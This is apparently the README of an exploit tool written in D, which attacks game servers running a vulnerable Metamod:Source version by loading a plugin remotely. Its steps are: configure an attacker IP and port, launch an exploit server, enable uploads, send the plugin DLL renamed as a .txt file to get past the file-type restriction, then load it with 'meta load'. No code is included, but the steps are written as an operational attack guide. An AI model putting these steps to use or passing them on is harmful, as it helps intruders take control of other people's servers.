DLangMMSPExploit (Fixed in alliedmodders/metamod-source#102)
D-Language based MMS plugin and server for exploiting vulnerable servers.
- Run
build.sh
- Done
- Run
build.bat
- Done
sv_cheats 1
andsv_allow_point_servercommand always
.- Access to
sm_rcon
. - Access to
rcon
.
- Set your IP address and port in
ExploitServer.d
/MMSP.d
and open port. - Build it.
- Launch
ExploitServer.exe
. - Execute
sv_allowupload 1
on server. - You need to send the DLL using
m_NetChannel->SendFile
. (The DLL format is not allowed to be sent but no one forbids changing the format in TXT) - Execute
meta load ./download/MMSP.txt
on server. - Done. (If everything is done correctly you will see
EXPLOITED
in the server window)